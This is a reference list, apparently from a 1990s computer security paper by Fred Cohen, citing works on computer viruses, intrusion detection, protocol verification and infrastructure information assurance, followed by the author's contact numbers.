Cohen, F., 1988. A New Integrity-Based Model for Limited Protection Against Computer Viruses, Masters Thesis, The Pennsylvania State University, College Park, PA, 1988.

Cohen, F., 1988b. Models of Practical Defenses Against Computer Viruses, IFIP-TC11, Computers & Security, Vol. 7, No. 6, 1988.

Cohen, F., 1991. A Short Course on Systems Administration and Security Under Unix, ASP Press, 1991.

Dunnigan, J.F. and Nofi, A.A., 1995. Victory and Deceit - Dirty Tricks at War, William Morrow and Co., 1995.

Feustal, E.A., 1973. On the Advantages of Tagged Architecture, IEEE Trans. on Computers, C-22, No. 7, July 1973, pp. 644-656.

GASSP, 1995. Generally Accepted System Security Principles, Prepared by the GSSP Draft Sub-committee.

Hailpern, B.T. and Owicki, S.S., 1983. Modular Verification of Computer Communication Protocols, IEEE Communications, Vol. 31, No. 1, January 1983.

Harrison, M. et al., 1976. Protection in Operating Systems, CACM, Vol. 19, No. 8, August 1976, pp. 461-471.

Hecht, H., 1993. Rare Conditions - An Important Cause of Faults, IEEE 0-7803-1251-1/93, 1993.

Cohen, F., 1994. A Short Course on Computer Viruses, 2nd Ed., John Wiley, New York, 1994.

Cohen, F., 1994b. Operating Systems Protection Through Program Evolution, IFIP-TC11, Computers & Security, 1994.

Cohen, F., 1994c. It's Alive!!!, John Wiley and Sons, 1994.

Cohen, F., 1995. Protection and Security on the Information Superhighway, John Wiley and Sons, New York, 1995.

Cohen, F. et al., 1993. Defensive Information Warfare - Information Assurance, Task Order 90-SAIC-019, DOD Contract No. DCA 100-90-C-0058, December 1993.

Cohen, F. and Mishra, S., 1994. Experiments on the Impact of Computer Viruses on Modern Computer Networks, IFIP-TC11, Computers & Security, 1994.

Hoffman, L.J., 1990. Rogue Programs: Viruses, Worms, and Trojan Horses, Van Nostrand Reinhold, 1990.

Knight, G., 1978. Cryptanalysts' Corner, Cryptologia, Vol. 1, January 1978, pp. 68-74.

Lampson, B.W., 1973. A Note on the Confinement Problem, CACM, 16(10), October 1973, pp. 613-615.

Landwehr, C.E., 1983. The Best Available Technologies for Computer Security, IEEE Computer, Vol. 16, No. 7, July 1983.

Linde, R., 1975. Operating System Penetration, AFIPS National Computer Conference, 1975, pp. 361-368.

Liepins, G.E. and Vaccaro, H.S., 1992. Intrusion Detection: Its Role and Validation, Computers & Security, Vol. 11, 1992, pp. 347-355.

Cohen, F. et al., 1996. National Info-Sec Technical Baseline - Intrusion Detection and Response, Lawrence Livermore National Laboratory/Sandia National Laboratories, December 1996.

Lyu, M., 1995. Handbook of Software Reliability Engineering.

Merlin, P.M., 1979. Specification and Validation of Protocols, IEEE Communications, Vol. 27, No. 11, November 1979.

Cohen, F., 1997. A Secure World-Wide-Web Server, IFIP-TC11, Computers & Security, 1997, in press.

Neumann, P.G., 1995. Computer Related Risks, Addison-Wesley/ACM Press, 1995.

Neumann, P. and Parker, D., 1989. A Summary of Computer Misuse Techniques, Proceedings of the 12th National Computer Conference, October 1989.

Dagle, J. et al., 1996. Assessment of Information Assurance for the Utility Industry, Electric Power Research Institute, Draft, December 5, 1996, Palo Alto, California, USA.

NSTAC, 1996. National Security Telecommunications Advisory Committee, Information Assurance Task Force - Electric Power Information Assurance Risk Assessment, November 1996 draft.

Danthine, A.A.S., 1982. Protocol Representation with Finite State Machines, Computer Network Architectures and Protocols, P.E. Green, Jr., Editor, Plenum Press, 1982.

Palmer, J.W. and Sabnani, K.K., 1986. A Survey of Protocol Verification Techniques, MilCom, September 1986.

Pekarske, R., 1990. Restoration in a Flash - Using DS3 Cross-connects, Telephony, September 10, 1990.

Sabnani, K.K. and Dahbura, A., 1985. A New Technique for Generating Protocol Tests, Computer Communications Review, 1985.

SAIC-IW, 1995. Information Warfare - Legal, Regulatory, Policy, and Organizational Considerations for Assurance, July 4, 1995.

Sarikaya, B. and Bochmann, G.V., 1982. Some Experience with Test Sequence Generation for Protocols, Protocol Specification, Testing, and Verification II, C. Sunshine, Editor, North-Holland Publishing, 1982.

Shannon, C., 1949. Communication Theory of Secrecy Systems, Bell System Technical Journal, 1949, pp. 656-715.

Spafford, E., 1992. Common System Vulnerabilities, Software Engineering Research Center, Computer Science Department, Purdue University, March 1992.

Sunshine, C., 1979. Formal Techniques for Protocol Specification and Verification, IEEE Computer, 1979.

Thyfault, M.E. et al., 1992. Weak Links, Information Week, August 10, 1992, pp. 26-31.

Turing, A., 1936. On Computable Numbers, with an Application to the Entscheidungsproblem, London Math. Soc., Ser. 2, Vol. 42, November 12, 1936, pp. 230-265.

van Eck, W., 1985. Electromagnetic Radiation from Video Display Units: An Eavesdropping Risk?, Computers & Security, Vol. 4, 1985, pp. 269-286.

Voas, J. et al., 1993. A Model for Detecting the Existence of Software Corruptions in Real-Time, IFIP-TC11, Computers & Security, Vol. 12, No. 3, 1993, pp. 275-283.

Winkelman, 1995. Misdirected phone call shuts down local power, ACM SIGSOFT Software Engineering Notes, Vol. 20, No. 3, July 1995, pp. 7-8.

WSCC, 1996. Western Systems Coordinating Council, WSCC Preliminary System Disturbance Report, August 10, 1996, draft.

Fred Cohen can be reached at tel: +l 510-294-2087; fax: +l 510-294-1225.
